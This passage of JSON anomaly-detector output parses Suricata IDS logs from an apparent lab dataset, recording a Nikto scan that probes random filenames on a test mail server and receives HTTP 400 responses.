(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80", "/parser/model/time": 1583349514.34725, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46942, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.34757, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46942, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1217064866564597, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80", "/parser/model/time": 1583349514.349169, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46944, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.el", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.349508, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":883960087990575,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46944, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":883960087990575,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 883960087990575, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80", "/parser/model/time": 1583349514.351261, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46946, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.351522, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":455618704595240,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", 
